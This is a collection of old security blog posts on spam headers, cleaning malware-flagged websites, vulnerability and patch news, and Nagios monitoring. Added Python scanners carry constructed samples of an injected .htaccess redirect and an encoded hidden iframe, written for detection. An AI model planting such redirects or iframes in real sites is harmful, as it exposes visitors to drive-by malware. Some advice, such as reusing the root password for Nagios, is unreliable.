There Is Nothing Which Can Stop Spam Mails Coming or Going Out Of Your Mail Address!!!

Email spam [junk mail or unwanted email] really annoys everyone. There’s something hideous about craftily and repeatedly forcing worthless products onto millions of people who really couldn’t care less about viagra logo enhancements or anything else on offer. Spam is a big problem for everyone, from the individual home Internet user to the multi-national corporation that depends on email communications to conduct business.

There are different kinds of spamming around this electronic web world.
– Repeatedly forcing useless products onto millions.
– Hidden text and links
– Blog and Wiki spamming
– Email Bombing
– Porno spam [Mailing of “adult” advertisements or pornographic pictures]
– Virus spam [Mass mailing that contain viruses, Trojans, malicious scripts, etc.]
– Spam scams [Mass mailing of fraudulent messages]
Etc…..

There are more and more spam categories. Do you ever think about:
– What is the reason behind it?
– Why is this spam not blocked all the time?
– How does this spamming happen?
– What action can you take against spamming?
– Can’t we stop this spamming?

Yes, there are many questions about this, but the real problem is “the worst mailing protocol itself”. The founder of the mail protocol never thought of this kind of misuse of the invention. Yes, that’s true! Now no one can change this protocol, because it has spread like a spider web all over the world. The craziest thing about mailing is that anyone can send mail to anyone using someone else’s mail address, whether that mail address exists or not! That means I can send mail from your mail ID without using your mail account. Isn’t that crazy!!!

There are many tools and companies in the world that try to stop and prohibit spamming, but all have failed. Until now there is no product or agency which can stop spam mails coming to or going out of your mail address. So this is all about mail security. We can only hope a good system will come along to stop this nonsense in the future.
But there are still some tips for identifying spam mail yourself. It is a little technical, but I hope everyone can follow it. Just by looking at a mail you can’t tell who sent it or where it came from. The only way to check is to look at the header of the mail. All mail clients have an option to view the header. It will look something like this; the appearance may differ depending on the provider:

Return-Path: [spamers@address.com]
Received: from server.anydomai.com (mail.anymaildomain.com [126.43.75.123])
    by spam01.d2.dfd.com (8.10.2/8.10.2) with ESMTP id NAA23597;
    Fri, 12 Dec 2008 16:11:20 -0400 (EDT)
Received: from aol.com (127-34-56-98.dsl.mybigisp.com [127.34.56.98])
    by server.mymailhost.com; Fri, 12 Jul 2002 13:09:38 -0700 (PDT)
Date: Fri, 12 Jul 2002 13:09:38 -0700 (PDT)
From: Hot Summer Deals <faike@aol.com>
To: your@mailaddress.com
Subject: You won the price of 10$Bln!!

Here you need to check the initial 6 lines, which give the exact picture of the reply address and the server the mail came from. These should match the last 3 lines. Sometimes this also doesn’t work, so it is not a 100% reliable way to identify spam mail. I hope you can see the complexity of mail identification.
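
The comparison described above can be scripted. This is an added example, not code from the original post: it assumes Python's standard email module, a constructed sample message that uses reserved example domains, and a simplified "last two labels" rule for deciding whether two host names belong to the same domain.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample modelled on the header shown above; not a real message.
SAMPLE = """\
Return-Path: <bulk@sender.example>
Received: from server.relay.example (mail.relay.example [192.0.2.10])
    by mx.recipient.example with ESMTP id NAA23597;
    Fri, 12 Jul 2002 16:11:20 -0400 (EDT)
Received: from aol.com (127-34-56-98.dsl.mybigisp.example [198.51.100.98])
    by server.relay.example; Fri, 12 Jul 2002 13:09:38 -0700 (PDT)
Date: Fri, 12 Jul 2002 13:09:38 -0700 (PDT)
From: Hot Summer Deals <faike@aol.com>
To: you@recipient.example
Subject: You won

(body)
"""

# "from <name the sender claimed> (<reverse-DNS name> [<IP>])"
RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\((\S+)\s+\[([0-9A-Fa-f.:]+)\]\)")


def base_domain(name):
    """Last two labels of a host name (assumption: no public-suffix handling)."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def address_domain(header_value):
    """Domain part of the address in a From/Return-Path header, or ''."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def header_findings(raw_message):
    """Return a list of mismatches between envelope, relay and From data."""
    msg = message_from_string(raw_message)
    findings = []
    from_dom = address_domain(msg.get("From"))
    return_dom = address_domain(msg.get("Return-Path"))
    if from_dom and return_dom and base_domain(from_dom) != base_domain(return_dom):
        findings.append(f"Return-Path domain {return_dom} != From domain {from_dom}")

    relay_domains = set()
    for value in msg.get_all("Received", []):
        match = RECEIVED_RE.search(" ".join(value.split()))
        if not match:
            continue  # formats vary between mail servers; skip what we cannot parse
        claimed, rdns, ip = match.groups()
        relay_domains.add(base_domain(rdns))
        if base_domain(claimed) != base_domain(rdns):
            findings.append(f"relay {ip} said it was {claimed} but resolves to {rdns}")

    if from_dom and relay_domains and base_domain(from_dom) not in relay_domains:
        findings.append(f"no relay belongs to the From domain {from_dom}")
    return findings


if __name__ == "__main__":
    for finding in header_findings(SAMPLE):
        print("SUSPICIOUS:", finding)
```

Only the Received line written by your own mail server is reliable; everything below it is supplied by the sender, so treat the findings as hints rather than proof.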

NOTE: A better solution is to stop opening mails from unknown persons. Never click any link in a mail, and never download an attached file that you are not sure about.

How To Remove Google Search Virus Warning Alert? This Site May Harm Your Computer


If your website is facing this problem in search results, you need to check the following.

1) Check whether your ‘.htaccess’ file has been hacked.

Someone may have hacked your ‘.htaccess’ file and added malicious redirection code to it. What does that mean? It redirects requests coming from Google or any other search engine to malicious domains. To fix this, remove all infected ‘.htaccess’ files or replace them with the original ones.

2) Make sure your website is not affiliated with any malware-related websites or activities.

Your site may be infected by an iframe attack, in which hackers insert JavaScript iframe code into the first or last line of the index pages in every folder. This loads an external malicious page on the visitor’s computer, which installs nasty programs. The code is inserted in encoded form, so it looks like “%20%77%69%6e” in a file. You need to clean this.
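
For point 1 above, a check for the kind of ‘.htaccess’ redirect described there can be automated. This is an added example, not part of the original post: the sample file, the host names and the function name are constructed for illustration, and it looks only at mod_rewrite RewriteCond/RewriteRule lines.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: one legitimate rule and one injected block.
SAMPLE_HTACCESS = """\
RewriteEngine On
# legitimate: force the canonical host name
RewriteCond %{HTTP_HOST} !^www.mysite.example$ [NC]
RewriteRule ^(.*)$ http://www.mysite.example/$1 [R=301,L]
# injected (constructed): only visitors arriving from a search engine are sent away
RewriteCond %{HTTP_REFERER} (google|yahoo|msn) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (googlebot|slurp) [NC]
RewriteRule ^(.*)$ http://redirect-target.example/in.php?q=$1 [R=302,L]
"""

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{(\w+)\}", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)

# Server variables that let a rule behave differently for search-engine traffic.
VISITOR_VARS = {"HTTP_REFERER", "HTTP_USER_AGENT"}


def suspicious_rewrites(text, own_hosts):
    """Return (line, target host, variables) for rules that send visitors to a
    foreign host depending on where they came from or what browser they use."""
    findings, pending = [], []
    for line_no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        cond = COND_RE.match(line)
        if cond:
            pending.append(cond.group(1).upper())
            continue
        rule = RULE_RE.match(line)
        if rule:
            host = (urlsplit(rule.group(2)).hostname or "").lower()
            used = sorted(VISITOR_VARS & set(pending))
            if host and host not in own_hosts and used:
                findings.append((line_no, host, used))
            pending = []  # conditions apply only to the next RewriteRule
    return findings


if __name__ == "__main__":
    for line_no, host, used in suspicious_rewrites(SAMPLE_HTACCESS, {"www.mysite.example"}):
        print(f"line {line_no}: redirect to {host} conditioned on {', '.join(used)}")
```

Because such rules fire only for search-engine traffic, opening the site directly in a browser will not show the redirect; inspecting the file itself is the dependable check.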

Once you have reviewed your website and are sure it is clean, you can manually submit a request to Google to re-review your site, as follows.
Using Google Webmaster Tools. (Note: you need to verify site ownership to see this information).

1. Sign in to Webmaster Tools with your Google account.
2. On the Dashboard, select the site you want.
3. On the Overview page, click Request a review and follow the instructions.

After this, Google will review your website manually and, once they have made sure that it doesn’t host or distribute any type of malware, they will remove the warning from search results and re-index the site.

Update:-

I forgot to mention the reasons and precautions for this problem; here they are…

This can happen for various reasons like:

– poor/compromised account/FTP passwords, which allow hackers to guess the password [or use brute-force tools] and get unauthorized access.
– the user’s computer being infected by viruses and controlled by hackers. In this situation, the customer’s uploads also get infected.
– poor scripts, which allow hackers to insert various malformed queries, remotely execute code and perform the intended action.
– virus-infected themes selected for the application.
– installing applications downloaded from third-party sites, mainly non-genuine sites.

You will have to ensure that you:

– generate a strong password combination [for account, FTP, database etc.]
– scan your local computer with good antivirus and anti-spyware programs and clean out bad programs.
– keep the software up to date with vendors/developers, and check their support/forums for any known vulnerabilities/fixes/workarounds available.

Vulnerability in iPhone – Vulnerability In iPhone Mail Application

The iPhone’s Mail and Safari browser applications could leave owners exposed to a URL spoofing vulnerability, which may allow attackers to conduct phishing attacks against the phone’s users.

By creating a specially crafted URL, and sending it via an e-mail, an attacker can convince the user that the spoofed URL, shown in the mail application, is from a trusted domain, such as a bank, PayPal or a social network.

When the iPhone user clicks on the URL, the Safari browser opens the spoofed URL, but the victim still sees it as if it were from a trusted domain.

The iPhone user will then be open to phishing attacks as they will enter private information, such as passwords, because they believe they are on the real site and not a fake.

In addition, security researcher Aviv Raff says, a security design flaw means the iPhone’s Mail application is also spammable.

iPhone Mail and Safari on firmware 1.1.4 and 2.0 are affected by this vulnerability. Earlier versions may also be affected, said Aviv Raff.

Mozilla Thunderbird with Nine Security Vulnerabilities: Fixed

Mozilla patched nine security vulnerabilities in Thunderbird.

Thunderbird 2.0.0.16, which was added to Mozilla’s download servers, quashes nine bugs, including one that was patched last week in Firefox, the company’s open-source browser. The remainder fix flaws that were first addressed in early July when Mozilla updated Firefox to version 2.0.0.15.

Seven of the nine bugs were rated moderate by Mozilla, the second-lowest of the four rankings in its threat system. The other two were low.
The bug patched in Thunderbird on 23rd Jul, which was fixed in Firefox before it, was in the browser rendering engine’s CSSValue array data structure. According to Mozilla, the vulnerability could be used by hackers to force a crash and, from there, run malicious code. Several other just-patched Thunderbird vulnerabilities could also be used by attackers to execute code remotely.

Thunderbird 2.x, like its browser sibling, is on the way out. Most of Mozilla’s attention is now on Thunderbird 3.0, which has been available as an Alpha 1 preview for more than two months.

Users can download Thunderbird in versions for Windows, Mac OS X and Linux from the Mozilla site, the e-mail client’s built-in updater or wait for the automatic update notification.


How to Monitor Websites and Web Services Live for Free from PC

Yes, you can monitor websites and web services live for free from your PC using Nagios. Nagios is a host and service monitoring tool designed to inform you of network problems. When problems are encountered, the Nagios daemon can send notifications out to you in a variety of different ways (email, instant message, etc.). Current status information, historical logs, and reports can all be accessed via a web browser too.

Features of Nagios include monitoring of network services like SMTP, POP3, HTTP, IMAP, PING, FTP, etc. These features can also be used to monitor your websites hosted on third-party hosting servers, right from your home/office PC!

Setting up Nagios for your domains:

1) Installation process

You can use the following commands to install the components needed.

  • Installing Apache/httpd and Nagios under Fedora Core/CentOS Linux

# yum install httpd
# chkconfig httpd on
# /etc/init.d/httpd start
# yum install nagios nagios-plugins nagios-plugins-all

  • Debian, Ubuntu Linux httpd/Apache and Nagios installation

# apt-get install apache2
# /etc/init.d/apache2 start
# apt-get install nagios-text nagios-plugins nagios-images
or
# apt-get install nagios2 nagios-plugins nagios-images

  • If you don’t have yum/apt, install stable Apache/Nagios by downloading from the following sites

Apache:- http://httpd.apache.org/
Nagios:- http://www.nagios.org/download/#stable

Now we are done with the installation. Next…
2) Configuring Nagios:

  • Add a custom directory for your *.cfg files

# mkdir /etc/nagios2/mysite

  • Edit /etc/nagios2/nagios.cfg and change the following path

Change the default path cfg_dir=/etc/nagios2/conf.d to
cfg_dir=/etc/nagios2/mysite

  • Create your own configuration files inside the defined directory, that is, in /etc/nagios2/mysite; add the following files.

contacts.cfg: Defines the people who will receive the alerts in case of a problem.
Here you need to change e-mail ID and Pager ID.

define contact{
contact_name                    Admin
alias                           Administrator Name
service_notification_period     24x7
host_notification_period        24x7
service_notification_options    w,u,c,r
host_notification_options       d,u,r
service_notification_commands   notify-by-email,notify-by-pager
host_notification_commands      host-notify-by-email,host-notify-by-epager
email                           admin@yourdomain.com
pager                           11111111@pager.yourdomain.com
}

define contactgroup{
contactgroup_name       admins
alias                   Nagios Administrators
members                 Admin ; contact_name should be added here
}

host.cfg: Defines the URLs that will be monitored.

## You can add as many URLs as you need, like below
define host{
host_name  jithesh.com
alias      Jithesh
address    www.jithesh.com
use        generic-host
}

define host{
host_name  blog.jithonline.com
alias      JithOnline
address    blog.jithonline.com
use        generic-host
}

#### Hostgroup_name ###
define hostgroup {
hostgroup_name  all
alias           All Servers
members         *
}

# A list of your servers
define hostgroup {
hostgroup_name    servers
alias           Servers
members         jithesh.com, blog.jithonline.com  ; add all host_name values here
}

services.cfg: Defines the services that will be monitored for each URL.

## Hostgroups services ##
define service {
hostgroup_name                 servers
service_description             HTTP
check_command                 check_http
use                             generic-service
notification_interval           0
}

define service {
hostgroup_name                 servers
service_description             PING
check_command                 check_ping!100.0,20%!500.0,60%
use                             generic-service
notification_interval           0
}

define service {
hostgroup_name                 servers
service_description             FTP
check_command                 check_ftp
use                             generic-service
notification_interval           0
}

define service {
hostgroup_name                 servers
service_description             POP
check_command                 check_pop
use                             generic-service
notification_interval           0
}

define service {
hostgroup_name                 servers
service_description             IMAP
check_command                 check_imap
use                             generic-service
notification_interval           0
}

define service {
hostgroup_name                 servers
service_description             SMTP
check_command                 check_smtp
use                             generic-service
notification_interval           0
}

templates.cfg: Defines some templates like the generic URL, the generic service and a lot of other custom templates.

In the default installation you will find files named generic-host_nagios2.cfg and generic-service_nagios2.cfg, and there might be others. Just copying and pasting them into the /etc/nagios2/mysite directory will work OK. Anyway, I prefer to put the definitions from each of them into a single file called templates.cfg, but that’s a personal preference.

timeperiods.cfg: Defines time periods which are valid for checks, notifications, etc.

The default configuration file is OK, so just copy and paste it from /etc/nagios2/conf.d/timeperiods_nagios2.cfg to /etc/nagios2/mysite/timeperiods.cfg.

So we are done with all the configuration.

3)  Restart the Nagios service:

# /etc/init.d/nagios2 restart
If there is any configuration error Nagios will tell you where it is when you attempt to restart the service.

4) Monitor your URLs

Open Nagios in a browser:
http://<nagios_server_host>/nagios2
user name: nagiosadmin
passwd: <set passwd> (in most cases the root passwd itself)

If you are still having problems, don’t hesitate to post a comment.

Best Tips to Protect your Web Sites from Hackers and Malicious contents


The Web is scarier than most people realize, according to research published recently by Google. These Web-based attacks have become much more common in recent years, as firewalls and better security practices by Microsoft have made it harder for worms and viruses to directly attack computers. Nowadays about 1.3 percent of all Google search queries list malicious results somewhere on the first few pages.

Criminals are getting better at this kind of work. They have built very successful automated tools that poke and prod Web sites, looking for programming errors and then exploit these flaws to install the drive-by download software. Often this code opens an invisible iFrame page on the victim’s browser that redirects it to a malicious Web server. That server then tries to install code on the victim’s PC. “The bad guys are getting exceptionally good at automating those attacks,”


Following are some tips to get rid of this hacker or hijacker activity.

Keep your username and password safe, and change the password frequently, always using a strong one. Check your password with Microsoft.

Keep your PC clean of viruses and spyware, because they can be used to hijack your PC’s contents, login cookies, etc. Scan your PC for viruses now with NOD32 Online Antivirus Scanner.

Keep the permissions of all folders and files in your web hosting account/server correct. Never give full permission, meaning read, write and execute permission, on folders and files. If you are hosting sites on a Linux platform, never give 777 permission (read, write and execute permission for all users, including web visitors) to files and folders. The preferred maximum permission is 755. This means write permission for root user and only read and execute permission for others.

There are many techniques used to hack/hijack a website:

Cross Site Scripting (XSS)

SQL injection flaws

Site reconnaissance

Session hijacking

Application denial of service

Cookie/session tampering

To withstand these you need “professionally well designed websites” and also a powerful website firewall at the server end.

You need to choose a good web hosting platform or company that provides good firewalls and security. If you are going for a Linux platform, it is better to choose servers with a Grsecurity-enabled kernel, especially for shared hosting.

Last but not least, the best way to find a flaw in your website is to check the website stats every day. This way you can find links/URLs that are not related to your website and delete them before they spread through search engines.

If someone reports that your site has a virus, then it is 99% sure that your site’s home pages have masked iframes at the beginning or in the last lines of the page, which actually download a virus file from some other server/site. You can fix it yourself by editing your home page and removing the content that looks like what is shown below.

[Image: Iframe]
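
Finding the masked iframes described here, and the encoded “%20%77%69%6e”-style injection described in the Google warning post above, can be automated. This is an added example, not code from the original posts: the sample page and host names are constructed, and the scanner goes beyond the first and last lines by checking the whole file for hidden iframes and for percent-encoded runs that decode to markup.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Six or more consecutive %XX bytes, like the "%20%77%69%6e" run quoted earlier.
ENCODED_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){6,}")


class IframeFinder(HTMLParser):
    """Collects (line, src host, hidden?) for every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attr = {name: (value or "") for name, value in attrs}
        style = attr.get("style", "").replace(" ", "").lower()
        hidden = (attr.get("width") in ("0", "1") or attr.get("height") in ("0", "1")
                  or "display:none" in style or "visibility:hidden" in style)
        host = urlsplit(attr.get("src", "")).hostname
        self.hits.append((self.getpos()[0], host, hidden))


def find_iframes(markup):
    parser = IframeFinder()
    parser.feed(markup)
    parser.close()
    return parser.hits


def scan_page(html, own_hosts):
    """Return (kind, line, host) findings for one page, ordered by line."""
    findings = []
    for line_no, host, hidden in find_iframes(html):
        if hidden and host not in own_hosts:
            findings.append(("hidden-iframe", line_no, host))
    for line_no, line in enumerate(html.splitlines(), 1):
        for run in ENCODED_RUN.finditer(line):
            decoded = unquote(run.group(0))
            inner = find_iframes(decoded)
            if inner:
                findings += [("encoded-iframe", line_no, h) for _, h, _ in inner]
            elif "<" in decoded:
                findings.append(("encoded-markup", line_no, None))
    return sorted(findings, key=lambda f: f[1])


# Constructed sample page: a legitimate iframe plus two injected last lines.
_INJECTED = '<iframe src="http://injected.example/in" width="1" height="1"></iframe>'
SAMPLE_PAGE = "\n".join([
    "<html><body>",
    '<iframe src="http://www.mysite.example/map" width="400" height="300"></iframe>',
    "<p>Welcome</p>",
    "</body></html>",
    "<script>document.write(unescape('%s'))</script>"
    % "".join("%%%02x" % byte for byte in _INJECTED.encode()),
    '<iframe src="http://injected.example/in" style="visibility: hidden"></iframe>',
])

if __name__ == "__main__":
    for kind, line_no, host in scan_page(SAMPLE_PAGE, {"www.mysite.example"}):
        print(f"line {line_no}: {kind} -> {host}")
```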

These are some of the tips that really help to protect yourself from hackers and malicious content.

Tips to Protect your PC from Malicious Sites Using McAfee Siteadvisor Plug-In

McAfee SiteAdvisor, a plug-in for Internet Explorer and Firefox browsers, tests, analyzes and rates websites in detail for unsafe or annoying practices such as dangerous downloads, spamming, misuse of personal information and browser hijacking. This helps you sidestep possible identity theft or fraud traps. When searching with Google, Yahoo! or MSN, SiteAdvisor’s easy-to-understand safety ratings too

1) Browser tool bar

As you browse a site, a small button on your browser toolbar changes color based on SiteAdvisor’s safety results.
Red (Danger)

McAfee tests revealed some serious issues that you’ll want to carefully consider before using this site at all. (Example: The site sent lots of spam e-mail or bundled adware with a download).

Yellow (Caution)

McAfee tests revealed some issues you should know about. (Example: a site tried to change browser defaults, or sent a lot of non-spam e-mail)

Green (Safe)

McAfee tested the site and didn’t find any significant problems. (Secure sites.)

Gray (Not submitted site)

The site has not been tested, or is in the process of being tested. You also have the option to submit the site for testing.

Menu options on SiteAdvisor’s toolbar let you customize SiteAdvisor or see a site’s detailed test results.

2) Search Page

When you search with Google, Yahoo! or MSN, SiteAdvisor’s safety ratings appear next to search results. A Red rating indicates danger: the site has been reported for virus downloads and also links to malicious sites that are already rated Red in the McAfee database.


You can also get more information about a site by keeping the mouse pointer on the alert symbol; it will show a popup in the search window itself, which gives a summary of the site’s status.


3) Detailed Test Results

Detailed test results for every site are also available by clicking on the more info link; there you can see the external sites which are linked to this site, as shown below.
[Image: Linked]

So it will be very handy to have McAfee SiteAdvisor installed on your PC while surfing the giant www network.

Download it here….

Google had security issue with its GrandCentral.com telecom service and Google.com : Fixed


Google has fixed security issues related to its Grand Central telecom service and its Google.com Web site.

Google fixed a cross site scripting exposure on the log-in page for Grand Central, a service that allows people to have numerous phone numbers ring on one phone and have a unified voice mail.

A cross-site script is a vulnerability found increasingly in Web applications in which malicious code can be injected into Web pages that could be used to attack or compromise visitors to the site.

“This issue was reported on Monday morning, and Google closed it shortly after being notified”.

The vulnerability was posted to a security e-mail list called Full Disclosure and was not reported to Google in advance, meaning Google had to race to fix the issue before someone could write an exploit for it.


In a separate security issue, Google fixed a weakness that allowed people to create a spoof site that looks like it goes to the Google.com domain but actually redirects a Web surfer to a different site. Such redirect links are usually distributed via e-mail and often send people to a site with malicious code that can be used to attack or compromise the visitor’s computer.

Google, meanwhile, was working to fix a redirect vulnerability related to the site of its DoubleClick online advertising unit.

Patches for Critical Bugs in Windows ActiveX System Released


Microsoft issued a critical patch for two vulnerabilities in the core graphics subsystem of Windows, one of eight fixes released Tuesday as part of its monthly security updates.

Microsoft released a total of five critical patches in its April security bulletin. Two of them fix bugs in Windows, two fix bugs in Windows and Internet Explorer (IE), and one fixes a vulnerability in Microsoft Office. The critical rating means an attacker could potentially exploit the flaws to hack into a victim’s computer.
The other patches fix vulnerabilities in Windows and Office and were rated “important.” Microsoft releases patches on the second Tuesday of every month, which has become known in the industry as “Patch Tuesday.”

* MS08-018, fixes for vulnerabilities in Microsoft Office

* MS08-021 fixes two vulnerabilities in Windows’ graphics device interface (GDI)

* MS08-022 patches vulnerability in VBScript and JScript scripting engines

* MS08-024 patches a vulnerability found in all versions of IE

* MS08-023 fixes an ActiveX vulnerability that affects both Windows and Internet Explorer.
In Sarwate’s opinion, MS08-021, MS08-022 and MS08-023 are especially important for users because they affect all versions of Windows, even if no other software is installed on the machine.